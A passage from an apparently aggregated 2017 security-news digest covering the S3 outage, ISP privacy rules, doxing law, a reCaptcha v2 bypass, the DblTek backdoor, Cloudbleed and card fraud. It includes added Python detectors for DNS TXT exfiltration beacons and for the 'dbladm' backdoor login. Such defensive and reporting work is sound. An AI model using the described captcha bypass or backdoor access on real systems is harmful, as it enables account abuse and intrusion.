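    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def shannon_entropy(text):
    """Bits per character; encoded payloads score higher than ordinary hostnames."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def max_in_window(times, window):
    """Largest number of events falling inside any interval of length `window`."""
    times = sorted(times)
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def find_txt_beacons(log_text, window=timedelta(minutes=5), min_queries=4, min_label=30):
    """Group TXT queries per (client, domain) and report hosts that query one
    domain at least `min_queries` times within `window`. Long leading labels
    are reported as a second signal: that is where encoded output would travel."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec[2] != "TXT":
            continue
        ts, client, _, qname = rec
        groups[(client, base_domain(qname))].append((ts, qname))

    alerts = []
    for (client, domain), records in groups.items():
        burst = max_in_window([ts for ts, _ in records], window)
        if burst < min_queries:
            continue
        # Labels left of the base domain are attacker-controlled in this scheme.
        labels = [lab for _, q in records for lab in q.split(".")[:-2]]
        longest = max(labels, key=len, default="")
        alerts.append({
            "client": client,
            "domain": domain,
            "txt_queries": len(records),
            "burst": burst,
            "max_label_len": len(longest),
            "label_entropy": round(shannon_entropy(longest), 2),
            "payload_labels": len(longest) >= min_label,
        })
    return sorted(alerts, key=lambda a: (a["client"], a["domain"]))


if __name__ == "__main__":
    for alert in find_txt_beacons(SAMPLE_LOG):
        print(alert)
```

The thresholds are deliberately loose for the sample; in a real resolver log they should be tuned against the baseline of legitimate TXT lookups (SPF, DMARC, DKIM) that mail infrastructure generates.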


How A Simple Command Typo Took Down Amazon S3 and Big Chunk of the Internet
3.3.2017 thehackernews Cyber

The major internet outage across the United States earlier this week was not due to any virus or malware or state-sponsored cyber attack, rather it was the result of a simple TYPO.
Amazon on Thursday admitted that an incorrectly typed command during a routine debugging of the company's billing system caused the 5-hour-long outage of some Amazon Web Services (AWS) servers on Tuesday.
The issue caused tens of thousands of websites and services to become completely unavailable, while others showed broken images and links, which left online users around the world confused.
The sites and services affected by the disruption include Quora, Slack, Medium, Giphy, Trello, Splitwise, Soundcloud, and IFTTT, among a ton of others.
Here's What Happened:
On Tuesday morning, members of Amazon Simple Storage Service (S3) team were debugging the S3 cloud-storage billing system.
As part of the process, the team needed to take a few billing servers offline, but unfortunately, it ended up taking down a large set of servers.
"Unfortunately, one of the inputs to the command was entered incorrectly, and a larger set of servers was removed than intended," Amazon said. "The servers that were inadvertently removed supported two other S3 subsystems." …Whoops.
As for why it took longer than expected to restart certain services, Amazon says that some of its servers have not been restarted in "many years."
Since the S3 system has experienced massive growth over the last several years, "the process of restarting these services and running the necessary safety checks to validate the integrity of the metadata took longer than expected."
The company apologized for the inconvenience faced by its customers and promised that it will be putting new safeguards in place.
Amazon said the company is making "several changes" as a result of this incident, including steps to prevent an incorrect input from triggering such problems in the future.
The typo that caused the internet outage this week also knocked out the AWS Service Health Dashboard, so the company had to use its Twitter account to keep customers updated on the incident.
Due to this, Amazon is also changing the administration console for the AWS Service Health Dashboard, so that it can run across multiple regions.
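As an added example (not Amazon's tooling), here is the kind of guard-rail a capacity-removal command can enforce so that a mistyped input cannot remove more servers than intended: a blast-radius limit on the share of the fleet a pattern matches, and a check that every subsystem, including ones the operator was not thinking about, keeps a minimum number of servers. The fleet, server names and subsystem names are constructed.

```python
"""Guard-rails for a fleet capacity-removal command, illustrating the kind
of safeguard described above: a mistyped input must not be able to remove
more servers than intended, and must not starve the subsystems that depend
on them.

Added example with a constructed fleet; this is not Amazon's tooling and
the server and subsystem names are invented.
"""
import fnmatch
from collections import defaultdict
from dataclasses import dataclass, field


class RemovalRefused(Exception):
    """Raised when a removal request fails a guard-rail."""


@dataclass
class RemovalPlan:
    to_remove: list
    remaining: dict          # subsystem -> servers still serving it
    warnings: list = field(default_factory=list)


# Constructed fleet: server name -> subsystems it serves (30 servers in total).
FLEET = {f"bill-{i:02d}": {"billing"} for i in range(1, 9)}
FLEET.update({"bill-09": {"billing", "index"}, "bill-10": {"billing", "placement"}})
FLEET.update({f"idx-{i:02d}": {"index"} for i in range(1, 13)})
FLEET.update({f"plc-{i:02d}": {"placement"} for i in range(1, 9)})


def plan_removal(fleet, pattern, *, max_fraction=0.10, min_per_subsystem=2,
                 allow_large=False):
    """Resolve a glob pattern against the fleet and check the result before
    anything is removed. Returns a RemovalPlan or raises RemovalRefused."""
    matched = sorted(fnmatch.filter(fleet, pattern))
    if not matched:
        raise RemovalRefused(f"pattern {pattern!r} matches no server")

    # Guard-rail 1: blast radius. A pattern that sweeps in a large share of the
    # fleet is far more likely to be a typo than an intended operation.
    fraction = len(matched) / len(fleet)
    if fraction > max_fraction and not allow_large:
        raise RemovalRefused(
            f"{pattern!r} matches {len(matched)} of {len(fleet)} servers "
            f"({fraction:.0%}), above the {max_fraction:.0%} limit; "
            "re-run with allow_large=True if this is really intended")

    # Guard-rail 2: capacity. Every subsystem must keep a minimum number of
    # servers, including subsystems the operator was not thinking about.
    remaining = defaultdict(int)
    for server, subsystems in fleet.items():
        if server not in matched:
            for sub in subsystems:
                remaining[sub] += 1
    all_subsystems = set().union(*fleet.values())
    starved = sorted(sub for sub in all_subsystems
                     if remaining[sub] < min_per_subsystem)
    if starved:
        raise RemovalRefused(
            f"removing {matched} would leave {starved} below "
            f"{min_per_subsystem} servers")

    plan = RemovalPlan(matched, {sub: remaining[sub] for sub in sorted(all_subsystems)})
    if fraction > max_fraction:
        plan.warnings.append(f"large removal ({fraction:.0%}) explicitly allowed")
    return plan


if __name__ == "__main__":
    # Intended input: three billing hosts.
    print(plan_removal(FLEET, "bill-0[1-3]"))
    # Mistyped input: the same prefix without the bracket sweeps every billing host.
    try:
        plan_removal(FLEET, "bill-*")
    except RemovalRefused as exc:
        print("refused:", exc)
```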


Trump's New FCC Chairman Lets ISPs Sell Your Private Data Without Your Consent
3.3.2017 thehackernews IT
Bad News for privacy concerned people!
It will be once again easier for Internet Service Providers (ISPs) to sell your personal data for marketing or advertisement purposes without taking your permission.
Last October, the United States Federal Communications Commission (FCC) passed a set of privacy rules on ISPs that restrict them from sharing your online data with third parties without your consent and require them to adopt "reasonable measures" to protect consumers' data from hackers.
However, now the FCC suspended privacy rules before they came into effect.
The reason? President Donald Trump's newly appointed FCC chairman Ajit Pai, a Republican and ex-Verizon lawyer.
Ajit Pai, who has openly expressed his views against net neutrality in the past, said just last week during a speech at Mobile World Congress that net neutrality was "a mistake" and indicated that the Commission is now reversing course on internet regulation.
Now Pai has suspended the privacy rules on ISPs, arguing that they favored companies like Google and Facebook, which are regulated by the Federal Trade Commission (FTC), over internet providers like Comcast and Verizon.
Pai wants the FCC and the FTC to treat all online entities the same way, so in his view the new privacy rules should be scrapped.
"All actors in the online space should be subject to the same rules, and the federal government shouldn’t favor one set of companies over another," the FCC said in a statement.
"Therefore, he has advocated returning to a technology-neutral privacy framework for the online world and harmonizing the FCC’s privacy rules for broadband providers with the FTC’s standards for others in the digital economy."
The FCC will now likely pass a new set of standards modelled on the way the FTC regulates websites. That is, if the FTC requires sites like Facebook and Google to seek explicit permission before selling your data, the FCC may follow suit for ISPs.
In other words, the FCC will keep the new privacy rules on hold. Since the FTC would never hurt the advertising business model of Google and Facebook, the FCC would never restore those suspended rules on ISPs.
How does this Move Affect You?
If you are unaware, your internet service provider knows your most intimate and personal online activities.
Unlike Google which uses encryption to prevent anyone from seeing your online searches, your ISP can see your search queries, what websites you visit, when you visit them, and what apps you use.
The ISPs then share this data with other companies for advertising, marketing or other purposes. With this information in hand, it is very easy for any advertising company to infer users' interests from their online behaviour and serve them targeted ads.
Not surprisingly, the broadband industry applauded the FCC's new move, calling it "a welcome recognition that consumers benefit most when privacy protections are consistently applied throughout the Internet ecosystem."
But privacy advocates are not at all happy with the FCC's action, arguing that suspending the privacy rules favors internet providers like Comcast and Verizon, since the ISPs will no longer need to meet the same data security rules the FTC requires of websites.


Trolling, Doxing & Cyberstalking: Cybercrime & The Law
3.3.2017 securityaffairs CyberCrime

Trolling, Doxing & Cyberstalking: Cybercrime & The Law. Cybercrime is one of the greatest threats facing the US, with implications for national security.
According to the US Department of Justice (DOJ), “cybercrime is one of the greatest threats facing our country and has enormous implications for our national security, economic prosperity, and public safety. The range of threats and the challenges they present for law enforcement expand just as rapidly as technology evolves.”


Cyberstalking

The US Attorney’s Office (USAO) released a report in 2016 which stated that, “under the federal cyberstalking statute, ‘cyberstalking’ includes any course of conduct or series of acts taken by the perpetrator on the Internet that place the victim in reasonable fear of death or serious bodily injury, or causes, attempts to cause, or would be reasonably expected to cause substantial emotional distress to the victim or the victim’s immediate family. 18 U.S.C. § 2261A (2015). However, there are a number of federal statutes that may apply in cyberstalking situations.”

The DOJ’s Office of Victims of Crime cites the following common elements of cyberstalking:

Repeated, unwanted, intrusive, and frightening communications from the perpetrator by phone, mail, and/or email
Making direct or indirect threats to harm the victim, the victim’s children, relatives, friends, or pets
Harassing the victim through the Internet
Posting information or spreading rumors about the victim on the Internet
Obtaining personal information about the victim by accessing public records, using Internet search services, hiring private investigators, searching through the victim’s garbage, following the victim around the internet and contacting the victim’s friends, family, co-workers, neighbors, etc.
Michigan was the first state to charge someone with online stalking. There are laws at both the state and federal levels that can be applied to cyberstalking.

“Stalking, threats, and harassment offenses used to be primarily local law enforcement matters. But with the increased use of technology and the multi-jurisdictional nature of many of these offenses, federal law enforcement and prosecutors can offer additional resources to effectively pursue these cases that may exceed the capacity of local law enforcement.”

Zane D. Memeger, former U.S. Attorney for the Eastern District of Pennsylvania wrote that, “a very important tool in our effort to combat stalking and threats via the Internet is 18 U.S.C. § 875(c), which makes it a federal crime, punishable by up to five years in prison and a $250,000 fine, to transmit any communication in interstate or foreign commerce containing a threat to injure the person of another.”

In 2016, there were several federal cyberstalking convictions.

A cyberstalking conviction can have a significant impact: on your finances, reputation, ability to get a job and your freedom. Even if you are not incarcerated, a conviction can have a negative impact on your parental rights and can disqualify you from employment in certain settings, such as hospitals and schools.

Doxing

Doxing is the process of gathering identifiable information about an individual or group of people, with the objective to shame, scare, blackmail, defame, bully or endanger the target.

While some individuals perform doxing out of general curiosity about a person or company, others have less honorable motives. The motives may include revenge, extortion, or embarrassment. But, publicly posting an individual’s personal details is often done with the knowledge that it could potentially put the targeted individual in danger, particularly if the person is a law enforcement officer, an undercover agent or a high profile individual.

Further, a dox is likely to drag the families and sometimes friends of the target into the fray. Sadly, this sometimes includes children.

Occasionally, doxing sets the target up for further cybercrimes including identity theft, credit card and/or debit card fraud, phishing, hacking or other cyber crimes.

Posting personal information publicly with the intent to shame, defame, harass or endanger is illegal. It places the doxed individual in a potentially dangerous situation. The federal law often utilized to address doxing is 18 U.S.C. § 2261A:

“Title 18, United States Code, Section 2261A is the federal stalking statute. Section 2261A(1) covers in-person stalking and Section 2261A(2) covers cyberstalking— stalking that occurs using Internet or telephones—as well as stalking that occurs using the mail. Section 2261(2), originally enacted as part of the Violence Against Women Act of 2005, has two main provisions—Subsections (A) and (B):

Both provisions require that the defendant act with the intent to kill, injure, harass, intimidate, or place under surveillance with intent to kill, injure, harass, or intimidate another person.
Both provisions also require the use of the mail, any interactive computer service or electronic communication service or electronic communication system of interstate commerce, or any other facility of interstate or foreign commerce. Usually, this element is met with the use of the Internet.
Both provisions also require that the defendant engaged in a course of conduct, meaning more than one act. Subsection (A) further requires that the course of conduct places the victim in reasonable fear of the death of, or serious bodily injury to, the victim, the victim’s spouse or intimate partner, or to an immediate family member of the victim. Subsection (B) requires instead that the course of conduct causes, attempts to cause, or would be reasonably expected to cause substantial emotional distress to the victim or the victim’s immediate family.”
Also, if you dox someone using a service such as Facebook, Twitter or WordPress you may be in violation of the service’s Terms of Service.

In the case of a group of individuals involved in the gathering of information, publicly posting it, sharing it or using it to harass the victim, under certain circumstances the act of one conspirator may be treated, by law, as an act of all involved. This means that all the conspirators may be held accountable for the acts committed by any one or more of them even though they did not all personally participate in that act themselves. This is particularly important in cases in which cyberstalking, including doxing, leads to the murder of the targeted individual:

“In the case of a jointly undertaken activity, subsection (a)(1)(B) provides that a defendant is accountable for the conduct (acts and omissions) of others that was both:

(A) in furtherance of the jointly undertaken criminal activity; and
(B) reasonably foreseeable in connection with that criminal activity.”
It has been argued that it is reasonably foreseeable that publicly posting someone’s personal information could endanger that individual and/or members of their family.

Certain individuals have additional protection from doxing, under the law. This would include jurors, witnesses, court officers, informants and some state and local officers:

“(a) In General.—Whoever knowingly makes restricted personal information about a covered person, or a member of the immediate family of that covered person, publicly available—

with the intent to threaten, intimidate, or incite the commission of a crime of violence against that covered person, or a member of the immediate family of that covered person; or
with the intent and knowledge that the restricted personal information will be used to threaten, intimidate, or facilitate the commission of a crime of violence against that covered person, or a member of the immediate family of that covered person,
shall be fined under this title, imprisoned not more than 5 years, or both.

(b) Definitions.—In this section—

(1) the term “restricted personal information” means, with respect to an individual, the Social Security number, the home address, home phone number, mobile phone number, personal email, or home fax number of, and identifiable to, that individual;

(2) the term “covered person” means—

(A) an individual designated in section 1114;

(B) a grand or petit juror, witness, or other officer in or of, any court of the United States, or an officer who may be, or was, serving at any examination or other proceeding before any United States magistrate judge or other committing magistrate;

(C) an informant or witness in a Federal criminal investigation or prosecution; or

(D) a State or local officer or employee whose restricted personal information is made publicly available because of the participation in, or assistance provided to, a Federal criminal investigation by that officer or employee”

Disclosing the identity of an individual working undercover is also often against the law. Anyone who doxes someone who is working undercover for the federal government is in violation of federal law. Those who are protected by this law include intelligence officers, agents, informants, and sources.

“Whoever, in the course of a pattern of activities intended to identify and expose covert agents and with reason to believe that such activities would impair or impede the foreign intelligence activities of the United States, discloses any information that identifies an individual as a covert agent to any individual not authorized to receive classified information, knowing that the information disclosed so identifies such individual and that the United States is taking affirmative measures to conceal such individual’s classified intelligence relationship to the United States, shall be fined not more than $15,000 or imprisoned not more than three years, or both.”

It is also a bad idea to tip someone off that they are the focus of a federal investigation:

“Obstruction of Justice by ‘Tip-Off’

Although an individual who obstructs a federal investigation by tipping off the targets of the investigation is likely to incur liability either as a principal under 18 U.S.C. 2 or as an accessory after the fact under 18 U.S.C. 3, there are several federal anti-tip-off statutes like §1510, which prohibits bank officials from notifying suspects that they are under investigation, and which imposes a similar restriction on insurance company officers and employees.

(1) Except as otherwise specifically provided in this chapter any person who … (e) (i) intentionally discloses, or endeavors to disclose, to any other person the contents of any wire, oral, or electronic communication, intercepted by means authorized by subsections 2511(2)(a)(ii), 2511(2)(b) to (c), 2511(2)(e), 2516, and 2518 of this chapter, (ii) knowing or having reason to know that the information was obtained through the interception of such a communication in connection with a criminal investigation, (iii) having obtained or received the information in connection with a criminal investigation, and (iv) with intent to improperly obstruct, impede, or interfere with a duly authorized criminal investigation … (4)(a) … shall be fined under this title or imprisoned not more than five years, or both,” 18 U.S.C.2511(1)(e), (4)(a).”

This includes social media posts that would provide warning to a suspect or suspects that they are being investigated by the federal government.

Cyberstalking & Doxing Cases

Woman Sentenced for Harassing Victim on Social Media
Hacking, Carding, SWATting and OCD: The Case of Mir Islam
The Crackas With Attitude Case–Hacking The CIA Director
Kosovan-born Ardit Ferizi, who hacked into the servers of an American firm, nicked records on 1,300 US service personnel from its database, and published the info online. He was quickly caught and sent down for 20 years.
The death of television personality Charlotte Dawson and the possible role that online abuse played in her struggles with depression. The former model had told of her battles with depression and the abuse and harassment she suffered from users on Twitter.
Cyberstalking and Production of Child Pornography
A Cyberstalking Case That Ended in Murder: Three Family Members Receive Life Sentences for Courthouse Murder Conspiracy
The Psychology of Trolls & Cyberstalkers

Researchers from Winnipeg found clear evidence that trolling is associated specifically with sadism and to a lesser degree with Machiavellianism. The researchers also found that trolls who admit to being sadistic report that they tend to troll because they find it to be pleasurable.

Cyberstalkers, however, are often propelled by the presence of personality disorders, poor emotional control, and antisocial tendencies.

While trolls take pleasure in their behavior, cyberstalkers are more likely to be “highly distressed and angry with the victim. While they may get secondary pleasure from it, stalkers who intimidate or threaten usually have the very specific purpose of expressing their negative feelings and making the victim feel as bad as they do.”

Trolls are in it for fun but a cyberstalker tends to be more emotionally invested in pursuing the victim. Ignoring a troll will generally make them go away, but ignoring a cyberstalker can produce an escalation in the stalking behavior. If it gets to that point, it’s time to consider involving law enforcement.

Help for Victims

The DOJ has issued recommendations for people who believe they are victims of cyberstalking. The first step should be to demand that the stalker cease all contact and stop the harassing actions. Additionally, in order to facilitate prosecution of the perpetrator, the victim should:

Save all emails, messages, and other communications for evidence. It is vital that these are not altered in any way, and that the electronic copies are kept, rather than only printouts.
Save all records of threats against the victim’s safety or life. This includes any written or recorded threats, and logs of the date, time, and circumstances of verbal threats.
Contact the perpetrator’s internet service provider. Internet service providers (ISPs) prohibit their users from using their service to harass others. Contacting the ISP may result in discontinuation of the harasser’s internet service, and will put the ISP on notice to maintain records of the harasser’s internet use.
Keep detailed records of contact with ISP and law enforcement officials. It is important to keep a log of all reports made to any agency or provider, and to obtain copies of the official reports when available.
Additionally, the LookingGlass Special Investigations Unit recommends:

Use strong passwords (avoid clichés like birth dates)
Change passwords often
Do not use the same credentials on more than one account and never rotate or reuse old passwords
Do not use work emails for your social media accounts
Use privacy settings on social networking sites to allow only friends or connections to view the account’s content
Keep up to date on changes to privacy policy levels by frequently visiting the ‘Privacy and Security’ settings
If possible, limit your personal postings on media sites and carefully consider your comments
Disable geotagging features on mobile devices
Pay close attention to messages containing attachments or links to other websites; they may be infected


ReBreakCaptcha – How to break Google’s ReCaptcha v2 using Google’s APIs
3.3.2017 securityaffairs Safety

The researcher East-Ee Security devised a proof-of-concept bypass of Google’s reCaptcha V2 verification system dubbed ReBreakCaptcha.
East-Ee Security proposed a proof-of-concept bypass of Google’s reCaptcha V2 verification system dubbed ReBreakCaptcha. The PoC uses Google's own web-based tools for its purpose. According to the author, ReBreakCaptcha “lets you easily bypass Google’s reCaptcha v2 anywhere on the web.”

The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) service was devised to defeat bots and scripts that can be used to register thousands of accounts at a time. ReCaptcha is the CAPTCHA solution proposed by Google that leverages image, audio or text challenges to verify the presence of a human accessing the online service.

ReBreakCaptcha is able to bypass reCaptcha V2 via a script that leverages Google APIs to capture audio challenges as sound files.

The ReBreakCaptcha works in three stages:

Audio Challenge – Getting the correct challenge type.
Recognition – Converting the audio challenge file and sending it to Google’s Speech Recognition API.
Verification – Verifying the Speech Recognition result and bypassing the ReCaptcha.
The ReBreakCaptcha technique relies on obtaining an audio challenge as part of the reCaptcha process.


“Some of you may notice that instead of an audio challenge, sometimes you get a text challenge,” reads the blog post published by the East-Ee Security researcher. “To bypass it and get an audio challenge, you simply click the ‘Reload Challenge’ button until you get the correct type.”

Once the ‘get an audio challenge’ option is selected, reCaptcha allows the user to either play the audio file from the web page or download it.

“Let’s download the audio file and send it to Google Speech Recognition API. Before doing so, we will convert it to a ‘wav’ format, which is requested by Google’s Speech Recognition API. Now we have the audio challenge file and are ready to send it to Google Speech Recognition. How can this be done? Using (Google’s own) API,” continues the post.

The author then sends the audio to the Speech Recognition API, which returns the result in text format.

“We will send the ‘wav’ audio file and the Speech Recognition will send us back the result in a string (e.g. ‘25143’). This result will be the solution to our audio challenge,” East-Ee Security explains.

If you are interested in the ReBreakCaptcha technique, take a look at the Python-based proof-of-concept script available on GitHub.


High severity bug discovered in CISCO NETFLOW GENERATION APPLIANCE
3.3.2017 securityaffairs Vulnerability

A flaw in the Cisco NetFlow Generation Appliance, tracked as CVE-2017-3826, could be exploited by an unauthenticated, remote attacker to cause a DoS condition.
“A vulnerability in the Stream Control Transmission Protocol (SCTP) decoder of the Cisco NetFlow Generation Appliance (NGA) could allow an unauthenticated, remote attacker to cause the device to hang or unexpectedly reload, causing a denial of service (DoS) condition.” reads the Cisco Security Advisory.

NetFlow Generation Appliances are used in enterprise data centers to monitor Gigabit Ethernet high-throughput networks.

According to Cisco, the vulnerability resides in the appliance’s Stream Control Transmission Protocol (SCTP) decoder.

The flaw is due to incomplete validation of SCTP packets being monitored on the Cisco NetFlow Generation Appliance data ports. An attacker can trigger it by sending malformed SCTP packets on a network that is monitored by an NGA data port.

“SCTP packets addressed to the IP address of the NGA itself will not trigger this vulnerability. An exploit could allow the attacker to cause the appliance to become unresponsive or reload, causing a DoS condition. User interaction could be needed to recover the device using the reboot command from the CLI.” continues the advisory.

The bug impacts Cisco NetFlow Generation Appliances NGA 3140, NGA 3240 and NGA 3340.


Cisco released a security patch this week and confirmed that there are no workarounds for the issue. Users should apply the security update (Cisco NetFlow Generation Appliance Software release 1.1 (1a)) that fixes the bug as soon as possible.

The security patch is not available for the NGA 3140 because that model was discontinued on January 11, 2014.


Researchers spotted a hidden backdoor in Chinese IoT devices from the firm DblTek
3.3.2017 securityaffairs Cyber

Security experts at Trustwave have discovered a hidden backdoor in Internet of Things devices manufactured by the Chinese firm DblTek.
Researchers from Trustwave have discovered a backdoor in IoT devices manufactured by a Chinese vendor that is refusing to fix it.

The backdoored devices are produced by the VoIP firm DblTek; the researchers speculate the backdoor was introduced for debugging purposes.

The experts discovered that the Telnet interface of the GoIP has an undocumented user, namely “dbladm,” which provides root level shell access on the device. The account is not protected by a password, instead, it is protected by a proprietary challenge-response authentication scheme.


When someone attempts to log in to the device over Telnet as dbladm, the device connects to UDP port 11000 on 192.168.2.1 on the local network. If it receives a valid response, it grants access.

“Trustwave recently reported a remotely exploitable issue in the Telnet administrative interface of numerous DblTek branded devices. The issue permits a remote attacker to gain a shell with root privileges on the affected device due to a vendor backdoor in the authentication procedure.” reads the analysis published by Trustwave.
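The two traces the backdoor leaves on a network, a Telnet login as the undocumented account and the challenge packet the device sends to 192.168.2.1:11000, can both be alerted on. The detection below is an added example, not Trustwave's or DblTek's code; the log format, the sensor, and the device addresses 192.168.2.40/41 are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines from a hypothetical network sensor (not real DblTek logs).
# 192.168.2.40 and .41 stand in for GoIP gateways on the local network.
SAMPLE_LOG = """\
2017-03-03T10:00:01 telnet host=192.168.2.40 user=admin result=ok
2017-03-03T10:05:11 telnet host=192.168.2.40 user=dbladm result=challenge
2017-03-03T10:05:11 flow proto=udp src=192.168.2.40 dst=192.168.2.1 dport=11000
2017-03-03T10:05:12 flow proto=udp src=192.168.2.1 dst=192.168.2.40 sport=11000
2017-03-03T10:05:13 telnet host=192.168.2.40 user=dbladm result=shell
2017-03-03T11:30:00 flow proto=udp src=192.168.2.41 dst=192.168.2.1 dport=11000
"""

BACKDOOR_USER = "dbladm"                    # undocumented account from the analysis
CHALLENGE_PEER = ("192.168.2.1", 11000)     # where the device sends its challenge
CORRELATION_WINDOW = timedelta(seconds=5)   # assumed gap between login and beacon

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<kind>\S+) (?P<rest>.*)$")


def parse_line(line):
    """Turn 'TIMESTAMP KIND k=v k=v ...' into a dict; None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = dict(kv.split("=", 1) for kv in m.group("rest").split())
    return {"ts": datetime.fromisoformat(m.group("ts")), "kind": m.group("kind"), **fields}


def detect_dbladm_backdoor(log_text):
    """Return alerts for the two observable traces of the GoIP backdoor.

    1. A Telnet login using the 'dbladm' account.
    2. A UDP packet from a device to 192.168.2.1:11000 (the challenge), flagged
       even without a matching Telnet line, since the login may arrive on a
       link the sensor does not see; when a dbladm login on the same device
       precedes it within CORRELATION_WINDOW, the alert says so.
    """
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    alerts = []
    for e in events:
        if e["kind"] == "telnet" and e.get("user") == BACKDOOR_USER:
            alerts.append({"ts": e["ts"], "device": e["host"],
                           "rule": "backdoor-account-login"})
        elif (e["kind"] == "flow" and e.get("proto") == "udp"
              and e.get("dst") == CHALLENGE_PEER[0]
              and e.get("dport") == str(CHALLENGE_PEER[1])):
            correlated = any(
                t["kind"] == "telnet" and t.get("user") == BACKDOOR_USER
                and t.get("host") == e["src"]
                and timedelta(0) <= e["ts"] - t["ts"] <= CORRELATION_WINDOW
                for t in events)
            alerts.append({"ts": e["ts"], "device": e["src"],
                           "rule": "challenge-beacon",
                           "correlated_login": correlated})
    return alerts


if __name__ == "__main__":
    for alert in detect_dbladm_backdoor(SAMPLE_LOG):
        print(alert)
```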

The researchers responsibly reported the issue to the vendor, but the manufacturer issued new firmware with only minor changes that leave the access open.

DblTek then cut off all contact with Trustwave, which continued analyzing the backdoor and wrote PoC exploits for both the old and the new firmware versions.

The flawed firmware is present in almost all DblTek GSM-to-VoIP devices, which are mostly used by small and medium-sized businesses.

An Internet scan revealed hundreds of vulnerable devices online.


Cloudflare Finds No Evidence of "Cloudbleed" Exploitation

2.3.2017 securityweek Exploit
Cloudflare informed customers on Wednesday that it has found no evidence of the recently discovered memory leak being exploited for malicious purposes before it was patched.

The bug was discovered on February 17 by Google Project Zero researcher Tavis Ormandy. The expert jokingly considered calling it “Cloudbleed” due to some similarities to Heartbleed, and the name stuck.

Cloudflare determined that the bug caused its edge servers to run past the end of a buffer and return memory that contained potentially sensitive information, including cookies and authentication tokens. Ormandy also found that the leaked data included passwords, encryption keys, private messages from dating sites, chat messages, IP addresses and HTTPS requests.

The flaw was introduced in September 2016, but it had the greatest impact between February 13 and February 18, when one in every 3.3 million requests going through Cloudflare’s systems may have resulted in memory leakage. The bug itself was addressed within hours, but it took several days to contain the incident due to the fact that leaked data had been cached by search engines.

In a lengthy blog post published on Wednesday, Cloudflare co-founder and CEO Matthew Prince said that while this was “an extremely serious bug” with a potentially massive impact, an analysis of the logs had turned up no evidence of malicious exploitation. Prince also pointed out that a vast majority of customers were not impacted.

“If a hacker were aware of the bug before it was patched and trying to exploit it then the best way for them to do so would be to send as many requests as possible to a page that contained the set of conditions that would trigger the bug. They could then record the results. Most of what they would get would be useless, but some would contain very sensitive information,” Prince said.

“The nightmare scenario we have been worried about is if a hacker had been aware of the bug and had been quietly mining data before we were notified by Google's Project Zero team and were able to patch it,” he added.

While Cloudflare’s investigation into the Cloudbleed incident continues, to date it has not identified any instances where the leaked memory included passwords, payment card numbers, customer encryption keys, or health records.

It’s worth pointing out that Ormandy, who believed Cloudflare’s initial blog post on Cloudbleed downplayed the risk, did report finding passwords in the leaked data.

“It is not correct to conclude that no passwords, credit cards, health records, social security numbers, or customer encryption keys were ever exposed,” Prince said. “However, if there was any exposure, based on the data we’ve reviewed, it does not appear to have been widespread. We have also not had any confirmed reports of third parties discovering any of these sensitive data types on any cached pages.”

For users who are concerned that their data may have been exposed, a list of potentially affected websites and a simple Chrome app for Mac have been made available.


Online Fraud in the U.S. Grew Dramatically Post-EMV

2.3.2017 securityweek CyberCrime

The introduction of EMV (Europay, MasterCard, Visa) cards, also known as chip-and-PIN cards, into the U.S. has had the expected effect: with card-present fraud more difficult, fraudsters have moved to online card-not-present fraud. Domestic online fraud was 79% riskier in 2016 than in 2015, according to figures from the Forter/MRC Fraud Attack Index (PDF).

Forter, which provides a fraud detection system for merchants, teamed with the Merchant Risk Council (which currently has almost 450 member companies in more than 20 countries) to develop a Fraud Attack Index. This is defined as the 'dollars at risk per $100 of sales'. The 'dollars at risk' combines detected and prevented fraud with actual fraud.

The relative simplicity of cloning non-EMV cards made domestic (i.e., US) offline card-present fraud attractive. This is no longer easy. The introduction of more secure EMV cards has driven fraudsters from card-present to card-not-present fraud -- EMV was never going to eliminate fraud, it was merely going to change its nature. This is shown in the fraud attack index for 2016, rising from $2.7 in Q4 2015 to $4.98 in Q4 2016.


"Domestic order fraud," explains Forter's CEO Michael Reitblat, "has increased following the adoption of EMV (microchip cards) in the US. The fraudsters who used to steal and copy or counterfeit cards in the US now find that much harder, since card present transactions are increasingly protected by EMV -- and so have moved online instead." He adds that this has been further fueled by an increase in 'friendly fraud' or 'liar-buyer' fraud (where a person might buy an item and then report it undelivered in order to obtain a refund). "That's always been a trend," he said, "but it's increasingly moving from an occasional thing to a serious, serial problem for many retailers."

The greater part of international fraud against US merchants has always been online, and it is always a higher risk than domestic fraud. In absolute terms, it decreased by 13% compared to 2015 but is still 62.4% riskier than domestic fraud, despite the domestic switch from offline to online fraud within the US. Forter attributes the international decrease to growth in genuine international orders rather than a decrease in fraud.

For online fraud, the criminals need to obtain the victims' payment credentials. Forter notes a shift in account takeover (ATO) against merchant sites to ATO against online payment accounts. "A growing recent trend in the realm of account takeover (ATO)," says the report, "is the use of hacked online payment accounts such as PayPal, ApplePay, AndroidPay etc. In these attacks the fraudster breaks into the victim's account and uses the details there, including payment details, to make purchases and take actions as if they were the victim."

ATO on merchant websites is down 16% on the previous year; ATO on online payment accounts is up 131%.

Forter puts this shift down to improvements in merchants' cyber security combined with the 'unprecedented data breaches of the last few years.' These "included account and password information and this, combined with the fact that many consumers continue to reuse passwords across multiple accounts, has made this form of attack easier to carry out."

"It's an example of the speed at which fraudsters adapt to moves made to stop their attempts," explained Reitblat. "Merchants realized that ATO was a problem, and started guarding against it -- so fraudsters shifted, using similar tactics against online payment accounts, which is far harder for merchants to spot, and which in any event gives them greater scope for theft."

The big target in this shift to online fraud has been clothing -- apparel. Attacks against apparel rose 69.9% over 2016. "This is partly due to fraudsters who are moving online post-EMV continuing to operate in an industry with which they are comfortable," explains Reitblat. With card-present fraud, it is easy to walk into a shop, conduct the fraudulent transaction, and walk out with the clothes.

However, he added that it is also "partly because fraudsters who have been focusing on luxury goods for years (due to the high ROI they represent) are trying a new tactic. Rather than go for the low end of luxury goods (which retailers are now aware that they need to protect and scrutinize, as well as the high-end ones), they're getting equivalent products from apparel sites which are often less careful since they have not traditionally been major targets in the same ways that luxury sites have been."


Robots Vulnerable to Cyberattacks: Researchers

